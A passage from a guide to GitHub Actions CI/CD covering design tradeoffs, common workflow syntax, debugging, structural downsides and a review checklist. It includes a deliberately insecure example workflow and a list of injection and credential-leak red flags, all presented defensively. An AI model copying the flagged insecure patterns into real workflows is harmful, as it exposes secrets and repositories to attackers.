The signal: is “deploy” reversible quickly? If a bad deploy means a 30-minute rollback and a public incident, gate it. If a bad deploy means the next merge in 90 seconds fixes it, don’t.
What experienced teams choose: Environments are the single most underrated security primitive in Actions. They give you (a) per-environment secrets, (b) manual approvals, (c) branch restrictions, (d) wait timers, (e) audit trail. They’re free. Use them for anything touching production. The cost is that your team has to actually approve deploys, which adds latency — but that latency is the point.
8.6 Matrix sizing — when does parallelism stop helping
Option A: Wide matrix. Test on every supported version × every OS × every variant. Twenty parallel jobs.
Option B: Narrow matrix. Test on the most-common combination on every PR. Run the wide matrix nightly or on release.
The signal: what’s the marginal probability that a PR breaks on, say, Python 3.10 / Windows specifically, given it passes on Python 3.12 / Linux? For most projects, that probability is low. For projects with platform-specific code, it’s high.
What experienced teams choose: Narrow on every PR (one row of the matrix), wide on the merge to main and on a nightly schedule. This roughly 5x’s your perceived CI speed without giving up coverage. Critical projects (Django, Rust libraries, etc.) need wide matrices on every PR; for application code, narrow is usually fine.
8.7 Triggering on every push vs gating triggers
Option A: Trigger on push to all branches. Every commit gets CI. Maximum signal.
Option B: Trigger on PR + push to main. Branches get CI when you open a PR. main gets CI on merge.
The signal: how much do you pay per minute, and how many feature branches see how many WIP commits?
What experienced teams choose: PR + main, almost universally. Combined with concurrency: cancel-in-progress: true, this means each PR has at most one in-flight CI run, and unmerged work-in-progress doesn’t burn minutes. Cuts CI cost dramatically. Add paths: filters in monorepos so doc-only PRs don’t trigger full builds.
8.8 Reusable workflows in your own org vs forking community templates
Option A: Build internal reusable workflows from scratch. Full control. No external dependencies. High maintenance.
Option B: Fork or compose from community templates (actions/starter-workflows, philips-labs/terraform-aws-github-runner, etc.).
The signal: how generic is the pipeline? “Run npm test, deploy to S3” is generic. “Deploy to our internal Kubernetes cluster with our service mesh annotations” is not.
What experienced teams choose: Internal reusable workflows for org-specific patterns (deploy, release, security scan). Community templates as starting points only, with the understanding that you’ll diverge. Treat any external workflow you import the same as any external action — pin it, review it, watch for updates.
8.9 Logs and artifacts — how much retention do you actually need
Option A: Default retention (90 days). Easy. Expensive at scale.
Option B: Aggressive retention reduction (7-14 days for most artifacts).
The signal: When did you last look at a 30-day-old artifact? If the answer is “never except for compliance,” you’re paying for storage that nobody uses. At GitHub’s storage rates (~$0.008/GB/day for Actions storage), a team uploading 5GB/day with default 90-day retention is paying ~$100/month for stale data they will not look at.
What experienced teams choose: 7-day retention for build artifacts (tests, coverage, intermediate builds), 30-90 days only for release artifacts and audit logs. Set retention-days: explicitly in actions/upload-artifact. Most teams discover this only after their bill spikes.
8.10 To act or not — local workflow testing
Option A: Test workflows by pushing to a branch. Authentic, slow, public.
Option B: Run workflows locally with act (nektos/act). Fast, private, imperfect emulation.
The signal: how often are you iterating on workflow YAML?
What experienced teams choose: act for the rapid iteration phase (“does this even parse”), real GitHub for the validation phase (“does this work end to end with real secrets and OIDC”). act cannot perfectly emulate everything — OIDC, GitHub API context, some action behaviors differ — but it’ll catch 80% of mistakes in 10% of the time. Combine with actionlint for static analysis.
9. The Commands and APIs That Actually Matter
The 20% you reach for 80% of the time. Grouped by task.
Triggering work
on:
push:
branches: [main]
paths-ignore: ['**/*.md']
pull_request:
types: [opened, synchronize, reopened]
workflow_dispatch:
inputs:
ref: { type: string, required: true }
schedule:
- cron: '0 6 * * *'
workflow_call: {} # for reusable workflows
workflow_run:
workflows: ['CI']
types: [completed]
Checking out code
# Default: triggering ref, shallow clone (depth=1)
- uses: actions/checkout@v4
# Full history (needed for tools like semantic-release)
- uses: actions/checkout@v4
with: { fetch-depth: 0 }
# A specific ref
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }}
persist-credentials: false # if you don't want git ops to use the token
Setting up languages
- uses: actions/setup-node@v4
with: { node-version: '20', cache: 'npm' }
- uses: actions/setup-python@v5
with: { python-version: '3.12', cache: 'pip' }
- uses: actions/setup-go@v5
with: { go-version: '1.22', cache: true }
- uses: actions/setup-java@v4
with: { distribution: 'temurin', java-version: '21', cache: 'gradle' }
The cache: parameter is the easy win — it integrates with actions/cache automatically using the right paths and lockfile hashes.
Caching arbitrary paths
- uses: actions/cache@v4
with:
path: |
~/.cargo/registry
target
key: cargo-${{ runner.os }}-${{ hashFiles('**/Cargo.lock') }}
restore-keys: cargo-${{ runner.os }}-
Sharing data between jobs
# Upload
- uses: actions/upload-artifact@v4
with:
name: build-output
path: dist/
retention-days: 7
# Download in a later job
- uses: actions/download-artifact@v4
with: { name: build-output, path: dist/ }
# Job outputs (for small strings)
jobs:
build:
outputs:
version: ${{ steps.v.outputs.version }}
steps:
- id: v
run: echo "version=$(cat VERSION)" >> $GITHUB_OUTPUT
deploy:
needs: build
steps:
- run: deploy ${{ needs.build.outputs.version }}
Cloud authentication via OIDC
permissions:
id-token: write
contents: read
# AWS
- uses: aws-actions/configure-aws-credentials@v4
with:
role-to-assume: arn:aws:iam::123456789012:role/GitHubActions
aws-region: us-east-1
# GCP
- uses: google-github-actions/auth@v2
with:
workload_identity_provider: projects/123/locations/global/workloadIdentityPools/gh/providers/gh-prov
service_account: ci@my-project.iam.gserviceaccount.com
# Azure
- uses: azure/login@v2
with:
client-id: ${{ secrets.AZURE_CLIENT_ID }}
tenant-id: ${{ secrets.AZURE_TENANT_ID }}
subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
Docker — the buildx pattern
- uses: docker/setup-buildx-action@v3
- uses: docker/login-action@v3
with:
registry: ghcr.io
username: ${{ github.actor }}
password: ${{ secrets.GITHUB_TOKEN }}
- uses: docker/build-push-action@v5
with:
context: .
push: true
tags: ghcr.io/${{ github.repository }}:${{ github.sha }}
cache-from: type=gha
cache-to: type=gha,mode=max
The type=gha cache-from/cache-to uses Actions’ cache for Docker layer caching — substantially faster than rebuilding from scratch.
Conditional execution
# Only on main
if: github.ref == 'refs/heads/main'
# Only if a previous step failed
if: failure()
# Always run (cleanup)
if: always()
# Combinations
if: success() && github.event_name == 'push' && !contains(github.event.head_commit.message, '[skip-deploy]')
Concurrency
# Cancel old PR runs when new commits land
concurrency:
group: ci-${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: true
# Serialize deploys, queue rather than cancel
concurrency:
group: deploy-prod
cancel-in-progress: false
Common environment files (writing back to the workflow)
# Set an environment variable for subsequent steps
echo "VERSION=1.2.3" >> $GITHUB_ENV
# Set a step output
echo "tag=v1.2.3" >> $GITHUB_OUTPUT
# Add to PATH for subsequent steps
echo "/opt/mytool/bin" >> $GITHUB_PATH
# Add a Markdown summary visible in the run UI
echo "## Deploy results" >> $GITHUB_STEP_SUMMARY
echo "- ✅ Deployed v1.2.3" >> $GITHUB_STEP_SUMMARY
CLI — gh interaction with workflows
gh workflow list # list workflows in the current repo
gh workflow run ci.yml # trigger workflow_dispatch
gh workflow run ci.yml -f env=staging # with inputs
gh run list --workflow=ci.yml # list recent runs
gh run view <run-id> --log # full logs
gh run rerun <run-id> --failed # rerun failed jobs only
gh secret set DEPLOY_TOKEN # set a repo secret (prompts for value)
Useful actions you’ll reach for repeatedly
actions/checkout@v4— every workflowactions/setup-{node,python,go,java,dotnet,ruby}@vN— language toolchainsactions/cache@v4— arbitrary cachingactions/upload-artifact@v4/actions/download-artifact@v4— file passingaws-actions/configure-aws-credentials@v4— AWS OIDCgoogle-github-actions/auth@v2— GCP OIDCazure/login@v2— Azure OIDCdocker/{setup-buildx-action,login-action,build-push-action}@vN— Dockersoftprops/action-gh-release@v2— release publishingpeter-evans/create-pull-request@v6— bot-driven PRs (e.g. for automated dep updates)
10. How It Breaks
Failure modes and the debugging workflow that finds them quickly.
10.1 The workflow doesn’t run at all
Symptoms: You pushed, you pushed again, the Actions tab shows nothing. Causes, ordered by frequency:
- Wrong path (
.github/workflow/ci.ymlinstead of.github/workflows/ci.yml— note the plural). - YAML syntax error. The Actions tab usually shows a “Workflow file errors” section but only if the file is on the default branch. Errors on feature branches are silent.
- Trigger doesn’t match (e.g.
branches: [main]and you pushed tomaster). - Repo’s Actions are disabled (Settings → Actions → “Disable Actions for this repository”).
- The workflow is from an untrusted contributor’s first PR, awaiting approval (a setting).
Diagnosis: Run
actionlint .github/workflows/*.ymllocally. Check the default branch, not your feature branch. Check repo settings.
10.2 “Resource not accessible by integration”
Symptoms: A step that uses the GITHUB_TOKEN fails with permission errors.
Cause: The permissions: block doesn’t grant what the step needs. Or you set permissions partially and accidentally denied something.
Diagnosis: Read the permissions: block carefully. Remember: setting any value sets all unspecified to none. If you need to comment on PRs, you need pull-requests: write. If you need to push to the repo, contents: write. If you need to publish a package, packages: write.
Fix: Add the missing permission. Or in older repos, check Settings → Actions → General → Workflow permissions for the org-wide default.
10.3 “Could not assume role with OIDC”
Symptoms: AWS / GCP / Azure auth fails with a token validation error. Causes:
- Missing
id-token: writein the workflow’spermissions:block. - The IAM role’s trust policy doesn’t match the workflow’s
subclaim. Common mistakes: trusting the wrong repo, the wrong branch, missing:ref:refs/heads/mainformatting. - Mismatched audience (
audclaim). AWS expectssts.amazonaws.comby default. Diagnosis: Use theactions-oidc-debuggeraction to print the actual JWT claims, then match them against the trust policy. The most useful debugging step:
- name: Print OIDC claims
run: |
TOKEN=$(curl -s -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
"$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')
echo $TOKEN | cut -d '.' -f2 | base64 -d 2>/dev/null | jq .
10.4 Caches aren’t restoring
Symptoms: Builds are slow even though you have actions/cache configured.
Causes:
- The cache key includes something dynamic (timestamp, run ID), so it’s always a miss.
- Cache exceeded the 10 GB repo limit and was evicted.
- The cache is on a different OS than the runner — caches are scoped per
runner.os. - Different branches don’t share caches by default — only the default branch’s cache is restored on first run of a feature branch.
Diagnosis: Look at the action’s logs — it tells you whether it was a cache hit or miss and which key it used. Check repo Settings → Actions → Caches for current usage.
Fix: Cache keys should be stable for stable inputs. Use
restore-keys:for prefix-fallback so partial matches still help.
10.5 Mysterious slowness, jobs sitting in queue
Symptoms: Workflow status says “Queued” for a long time before starting. Causes:
- You hit your account’s concurrent job limit (typically 20-180 depending on plan, OS, runner type).
- You’re using a self-hosted label and no runner with that label is online.
- macOS or larger runners have lower concurrency limits and longer provisioning times.
Diagnosis: Check Settings → Actions → Runners for self-hosted health. Check Actions billing for concurrency caps. The runner label in
runs-on:must match advertised runner labels exactly.
10.6 “Job is in progress” but it isn’t
Symptoms: Run shows as in-progress for hours, no logs, no completion. Causes:
- Runner crashed mid-job and didn’t report status. GitHub will eventually time it out at 6 hours.
- Self-hosted runner lost network connectivity.
- A
tmateSSH session was opened and never closed. Diagnosis: Check the runner’s process on the host. For GitHub-hosted runners, just cancel and rerun. Fix: Addtimeout-minutes:to all jobs. Default is 360 (6 hours), which is usually too long.
jobs:
test:
timeout-minutes: 20 # fail fast if something hangs
10.7 Secret doesn’t appear
Symptoms: ${{ secrets.MY_SECRET }} is empty.
Causes:
- The secret is at the repo level but the workflow is triggered by a fork PR. Forks don’t get secrets.
- The secret is at the environment level but the job didn’t declare
environment:. - Org secret access isn’t granted to this repo (org settings → secrets → repository access).
- Typo in the secret name. (Secrets are case-sensitive.)
Diagnosis: GitHub doesn’t tell you secrets are missing — they just appear as empty strings, and your downstream tool fails with a confusing error. You can
if: ${{ env.X != '' }}to bail early with a clearer message.
10.8 The general debugging workflow
When you don’t know what’s wrong, in this order:
- Read the run page. Click into the failing job, the failing step. The exact error message is usually there.
- Compare to a known-good run. What changed in the workflow YAML? In dependencies?
- Re-run with debug logging. UI button: “Re-run with debug logging” → logs explode in size, including expression evaluation traces.
- Inspect environment variables. Add a step that prints
env,githubcontext, and relevantsecrets.*(the latter shows as***in logs but tells you whether it was empty). - Bisect with
tmate. Insertmxschmitt/action-tmate@v3into the workflow. SSH into the runner mid-execution and poke around. Indispensable for “it works on my machine” cases. - Run with
actlocally. If the issue isn’t auth or context-dependent,actreproduces it locally without the push-and-wait cycle. - Read the action’s source. Marketplace actions are open source. When
actions/cache@v4is doing something weird, look at the action’s repo. The issue tracker often has your bug already.
11. The Downsides — Honest Accounting
Actions is a powerful, often-correct choice. It is also a system with deep, structural disadvantages that don’t go away with experience or better config. This is what you sign up for.
11.1 The supply chain attack surface is enormous and largely unmonitored
Where it comes from: Mental Model 1 (repo as identity) plus the marketplace model means workflows routinely pull in dozens of third-party actions, each with full execution capability inside your CI runner. A compromised action sees everything the workflow sees — secrets, GITHUB_TOKEN, OIDC tokens, source code. The 2025 tj-actions/changed-files compromise (where the maintainer’s auth was abused to retag versions and exfiltrate secrets from thousands of repos) and the recurring npm Shai-Hulud worm propagating through OIDC publishing are not edge cases. They are the predictable consequence of running other people’s code with your credentials in your repo’s identity.
What it costs you: Real engineering time on pinning, cooldowns, and review. Real risk every time you add a new action. The maintenance work of keeping SHA-pinned actions updated without falling behind. Most teams in practice ignore this and run on tag pinning, accepting an unquantified attack surface in exchange for not thinking about it.
Dealbreaker when: You’re publishing to a package registry, deploying to production, or holding any kind of regulated data. The asymmetry is brutal — one bad action can leak everything.
What people think mitigates it but doesn’t: “I only use verified creators.” Verified creator status verifies identity, not security practices. Verified creators have been compromised. “I review the action’s code.” You reviewed it last month. The action’s main branch was force-pushed yesterday.
11.2 The expression injection class of bugs is structurally permanent
Where it comes from: Mental Model 2 — expressions evaluate before the runner sees the YAML. This is baked into the architecture; it can’t be fixed without breaking every existing workflow. GitHub’s mitigations (warnings in docs, actionlint, zizmor) are necessary but they don’t prevent the bug class. A motivated developer will write ${{ github.event.pull_request.title }} directly into a run: block forever.
What it costs you: Every workflow needs review for this specific anti-pattern. Every action you import inherits it. CVEs for marketplace actions of this exact shape get filed every few weeks.
Dealbreaker when: You’re maintaining open-source projects that accept PRs and process those PRs in any privileged context. The answer is essentially “don’t” — and that constraint shapes a lot of automation you might otherwise want.
11.3 Cross-repo workflows are second-class citizens
Where it comes from: Mental Model 1. The repo is the trust boundary. Workflows that span repos require deliberate workarounds — fine-grained personal access tokens, GitHub App credentials, repository_dispatch events, or the new “GitHub App tokens for CI” pattern. None of these have first-class support in the workflow YAML.
What it costs you: Cross-repo orchestration (build artifact in repo A, deploy from repo B) requires identity plumbing that’s surprisingly painful. Monorepo gravity is real here — Actions silently incentivizes consolidation because multi-repo workflows fight the platform.
Dealbreaker when: Your architecture is multi-repo by design (microservices each in their own repo with central deploy pipelines, infra-as-code in a separate repo from app code). Expect to build a meaningful amount of glue. Some teams find themselves maintaining a small “orchestrator” GitHub App just to bridge this gap.
11.4 GitHub-hosted runners have hard, opaque performance limits
Where it comes from: Multi-tenancy. A 2-core, 7GB-RAM ubuntu-latest runner is cheap (free for public repos) precisely because it’s small. There’s no way to make a single job faster except by buying a larger runner SKU.
What it costs you: Builds that take 30 minutes on ubuntu-latest would take 8 minutes on a 16-core machine. You can pay for larger runners, but the per-minute price scales linearly while the speedup tapers — a 4x runner often only delivers 1.5-2x speedup on real workloads, so cost-per-build rises. The reported developer-time waste from slow CI is large; the platform’s pricing model makes it expensive to fix.
Dealbreaker when: You have CPU-heavy or memory-heavy builds (large monorepos, big test suites, container builds). At that point, self-hosted on dedicated hardware or a third-party fast-runner provider (Blacksmith, WarpBuild, Depot) starts paying for itself.
11.5 Self-hosted runner operations are an iceberg
Where it comes from: Self-hosted is “we give you a binary, you run it.” Everything else — image management, scaling, isolation, security, monitoring, networking, cache colocation — is yours.
What it costs you: A meaningful operational burden. Actions Runner Controller on EKS is the recommended path; it requires Kubernetes expertise, custom runner images (the official ARC image is intentionally minimal — you’ll spend a sprint installing the tools your jobs need), runner version bumps every release, careful job-to-pod sizing, and Docker Hub rate-limit mitigation. The community-supported “Summerwind” version of ARC is technically deprecated; the official version is missing some features still. Spot instances are tempting but not reliable enough for runners — interruptions mid-job are operationally messy.
Dealbreaker when: You’re a small team without platform-engineering depth. The Cloud Posse and GitHub Well-Architected guides on self-hosted runners exist for a reason: it’s hard to do well, and easy to do badly in a way that bites you for months.
11.6 YAML expressiveness ceiling
Where it comes from: The workflow language is YAML with a small expression syntax — no loops, no functions, no conditionals beyond if: strings, no real composition primitives. Compared to Jenkinsfiles (Groovy) or GitLab CI’s templating, Actions YAML is rigid.
What it costs you: Complex pipelines become piles of nearly-identical jobs distinguished only by inputs. The matrix strategy can do simple combinatorics but can’t express dynamic generation cleanly (the workaround is “have a job that emits a JSON matrix,” which is a pattern you’ll see in any sophisticated repo). Reusable workflows have meaningful syntactic limits — they can’t be called from a matrix context in older versions, can’t easily compose.
Dealbreaker when: Your pipelines are themselves complex software (release engineering with hundreds of artifacts, conditional release gates, multi-target builds). Teams hit this ceiling at scale and either build their own pipeline orchestrator on top (calling Actions as the runner) or migrate to something more expressive.
11.7 The lock-in is total and silent
Where it comes from: Once your workflows live in .github/workflows/, your secrets in GitHub’s vault, your artifacts in GitHub’s storage, your OIDC trust relationships pointed at GitHub’s issuer, your release pipelines using softprops/action-gh-release, your registry tokens authenticated by GitHub Apps — you are deeply, structurally inside GitHub’s ecosystem. Migration to GitLab CI or Jenkins or anything else means rewriting all of this.
What it costs you: Optionality. You can no longer leave GitHub on a quarter’s notice. The migration is a multi-month project with real risk. This is GitHub’s moat, deliberately built. They are not subtle about it.
Dealbreaker when: You’re optimizing for portability or you’re in an industry where GitHub-the-company being a single vendor is an unacceptable risk. (Some regulated industries treat this as an actual concern.)
11.8 Debugging is genuinely worse than local dev
Where it comes from: The runner is ephemeral. Logs are streamed but the environment dies. Reproducing a CI failure locally requires either (a) act, with imperfect emulation, or (b) tmate to SSH in mid-job, which is fragile.
What it costs you: Time. The “push, wait 3 minutes, see failure, push again” loop is the single most frustrating thing about CI in general and Actions in particular. The OIDC and context system is intricate enough that “works locally / fails in CI” debugging takes a lot of echo-based archaeology.
Dealbreaker when: Never quite a dealbreaker — but a chronic productivity tax that compounds over a team’s lifetime.
11.9 macOS and Windows runners are expensive and slow
Where it comes from: Apple licensing and Microsoft’s pricing for Windows in cloud environments. macOS runners are roughly 10x the price per minute of Linux runners.
What it costs you: iOS and Mac development on Actions is meaningfully expensive at scale. Some teams maintain Mac mini farms because GitHub-hosted macOS runners are uneconomical above a certain volume.
Dealbreaker when: You’re an iOS-heavy shop or a cross-platform shop where Windows/macOS is in the critical path. Look at specialized providers (MacStadium, Blacksmith, others) before defaulting to GitHub-hosted.
11.10 Rate limits and cache eviction are silent productivity killers
Where it comes from: Cache: 10 GB per repo, 7-day eviction on no access. Cache upload: 200/min/repo. Download: 1500/min/repo. API rate limits on the GITHUB_TOKEN. Runner concurrency limits per account. None of these are usually a problem until they suddenly are, often during an incident or a release crunch.
What it costs you: Time spent debugging “why is my cache not working” or “why are my workflows queueing” only to realize you hit a quota.
Dealbreaker when: Almost never — but every team eventually has a “we hit a limit we didn’t know existed” outage. The mitigation is documenting limits in your runbook and monitoring proximity to them.
12. The Taste Test
What separates a workflow that an experienced engineer would respect from one that screams “wrote this by copy-pasting.”
Workflow YAML that reveals taste
beginner — overstuffed, copy-pasted, no permissions block, tags pinned to mutable refs:
name: Tests
on: [push, pull_request]
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@main # mutable: BAD
- uses: actions/setup-node@v3 # outdated
- run: npm install
- run: npm test
- uses: peter-evans/create-pull-request@v4
- uses: aws-actions/configure-aws-credentials@v1
with:
aws-access-key-id: ${{ secrets.AWS_KEY_ID }} # static creds: BAD
aws-secret-access-key: ${{ secrets.AWS_SECRET }}
- run: aws s3 sync dist/ s3://prod-bucket # deploy from PR: BAD
experienced — focused, explicit permissions, OIDC, gated deploys, pinned actions, concurrency control:
name: CI
on:
push:
branches: [main]
pull_request:
permissions:
contents: read
concurrency:
group: ci-${{ github.workflow }}-${{ github.ref }}
cancel-in-progress: true
jobs:
test:
runs-on: ubuntu-latest
timeout-minutes: 15
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: '20'
cache: 'npm'
- run: npm ci
- run: npm test
The experienced version doesn’t try to do everything in one workflow. Deploys live in a separate workflow, gated by an environment with manual approval, using OIDC for cloud auth.
Composite action that reveals taste
beginner — implicit shells, no inputs, no outputs:
runs:
using: composite
steps:
- run: npm ci
- run: npm run build
experienced — explicit shell, parameterized, surfaces useful outputs:
name: 'Build app'
description: 'Install deps and build, with caching'
inputs:
node-version:
description: 'Node version'
default: '20'
outputs:
build-time:
description: 'Time taken to build'
value: ${{ steps.build.outputs.duration }}
runs:
using: composite
steps:
- uses: actions/setup-node@v4
with:
node-version: ${{ inputs.node-version }}
cache: npm
- run: npm ci
shell: bash
- id: build
run: |
START=$(date +%s)
npm run build
echo "duration=$(($(date +%s) - START))" >> $GITHUB_OUTPUT
shell: bash
Repository structure that reveals taste
.github/
├── workflows/
│ ├── ci.yml # tests on every PR
│ ├── deploy-staging.yml # auto on merge to main
│ ├── deploy-prod.yml # gated by environment
│ ├── release.yml # on tag push
│ └── nightly.yml # cron-based heavy tests
├── actions/
│ ├── setup/ # composite: shared setup
│ └── deploy/ # composite: shared deploy logic
├── CODEOWNERS # gates changes to .github/
└── dependabot.yml # action version updates
What this signals: workflows have single responsibilities, shared logic is factored out, action updates are automated, changes to the CI itself are reviewed (CODEOWNERS on .github/).
Other red flags in code review
pull_request_targetanywhere — pause and demand justification.- Direct interpolation of
github.event.*intorun:blocks — script injection. ${{ secrets.X }}referenced in a workflow that runs onpull_request— won’t work for forks anyway, but signals confusion about the trust model.actions/checkoutwithpersist-credentials: true(default) before a step that downloads from the internet — credentials leak through.git/config.- Missing
permissions:block — relying on org default, which may be permissive. continue-on-error: trueon a security-relevant step — silently passing failures.- Self-hosted runner labels on public repos — RCE oracle (see Section 7.6).
Other green flags
timeout-minutes:on every job — defensive against hangs.concurrency:block on PR workflows withcancel-in-progress: true— cost-conscious.- OIDC instead of stored cloud secrets — modern security posture.
- Reusable workflows centralized in a templates repo — at-scale thinking.
- Renovate/Dependabot keeping action SHAs current with cooldown — supply chain hygiene.
- Workflow runs that emit
$GITHUB_STEP_SUMMARY— care for the operator. actionlintandzizmorrunning on the workflows themselves — meta.
13. Where to Go Deeper
A small number of resources worth your time.
The official docs at docs.github.com/en/actions. Surprisingly well-written, particularly the Concepts, Security, and Reference sections. The “Events that trigger workflows” page is canonical and worth reading once cover-to-cover.
GitHub Security Lab’s “Keeping your GitHub Actions and workflows secure” series (4 parts, on securitylab.github.com). Mandatory reading if you’re maintaining open source or operating Actions in any production-relevant way. The pwn-request and TOCTOU posts are the canonical references for the dangerous-event class of bugs.
actionlint (rhysd/actionlint) and zizmor (woodruffw/zizmor). Run both. Treat warnings as errors. actionlint catches typos and structural mistakes; zizmor catches security anti-patterns.
The Actions Runner Controller docs (docs.github.com/en/actions/concepts/runners/actions-runner-controller) and the GitHub Well-Architected library (wellarchitected.github.com). Mandatory before deploying self-hosted runners at scale. Some-Natalie’s blog (some-natalie.dev) has the most honest practical writing on self-hosted Actions in production.
Adnan Khan’s research blog and the Orca Security “pull_request nightmare” posts. The state of the art in attacking Actions in the wild. Read at least one to recalibrate your sense of how exposed real-world workflows are.
actions/starter-workflows. GitHub’s official template repo. Useful as a starting point and as a reference for what GitHub itself considers idiomatic.
The nektos/act README and Wiki. For local testing. Not perfect, but indispensable when you’re debugging workflow YAML.
The aws-actions/configure-aws-credentials README. The OIDC-with-AWS guide is unusually clear, and the patterns generalize to GCP and Azure (whose own auth-action READMEs are also worth reading).
Stop there. The marginal value of more “GitHub Actions tutorial” content drops to zero quickly; everything beyond this list is repetition.
14. The Final Verdict
GitHub Actions is the platform that finally made CI/CD feel like part of the source code rather than a parallel system bolted on. That’s a genuine, durable accomplishment. The cost is that the system encodes GitHub’s idea of how a software team should work — repo-centric, trunk-based, marketplace-augmented — and resists every other shape.
What it gets profoundly right: putting workflows in the repo, where they belong. Code review for CI changes, atomic rollbacks, branch-based experimentation — these were missing from CI/CD for two decades and Actions made them the default. The OIDC token model. “No long-lived secrets” was a security pipe dream until Actions and the cloud providers built trust federation that just works. Everyone else now has to copy this; GitHub got there first because they could iterate the issuer and the consumer (cloud providers) and the runner together. The marketplace. A million pieces of automation glue, free and shareable. The economic value of aws-actions/configure-aws-credentials existing — versus everyone rolling their own — is enormous.
What it gets wrong, and what it costs you: the pull_request_target design. This was a footgun on day one and remains one years later. Hundreds of CVEs trace to it. The expression-substitution-before-shell architecture. Permanent. Architectural. Every workflow needs human review for injection forever. Self-hosted as second-class. GitHub’s heart is in the hosted experience. Self-hosted is supported but it’s clearly not the path GitHub wants you on, and the operational burden reflects that. The lock-in. This is not subtle. Once you’re in, leaving costs months. That is the deal you sign.
Who should reach for this and who shouldn’t: Reach for it if your code is on GitHub, your team is small-to-medium, your build is not pathologically slow, and your security posture can absorb the supply-chain attack surface (or you’re willing to do the SHA-pinning work). For most teams in 2026 starting from scratch, this is the obvious default. Don’t reach for it if you’re cross-VCS, if you’re in a regulated air-gapped environment (where GitHub Enterprise Server or Jenkins still wins), if your pipeline is itself a complex piece of software (where Jenkinsfile’s Groovy or GitLab CI’s includes give you real composition), or if you genuinely need the deepest possible control — Jenkins is still Jenkins, and there are scenarios where its 1,800-plugin Cambrian explosion of capability is the right answer.
What you should now believe:
- Workflows live in the repo. The repo is the trust boundary. Most surprises come from forgetting this.
- OIDC has eaten static secrets and you should adopt it everywhere it’s supported. The argument is over.
- Marketplace actions are dependencies. Treat them as such — pin, audit, cooldown, contain.
pull_request_targetis named like a normal feature and behaves like a loaded gun. Don’t use it to build PR code, ever.- The platform’s strengths are repo-tight integration and ecosystem reach. Its weaknesses are cross-repo orchestration, self-hosted operations, and supply-chain hygiene. Plan accordingly.
The hard-won line: GitHub Actions is what happens when you take CI/CD seriously as a feature of source control rather than as a separate product. That’s its genius and its limitation. Use it where that frame fits the work; use something else where it doesn’t; and recognize that the one architectural decision — repo-as-source-of-truth — is doing 90% of the work in both columns.
The ideas are mine. The writing is AI assisted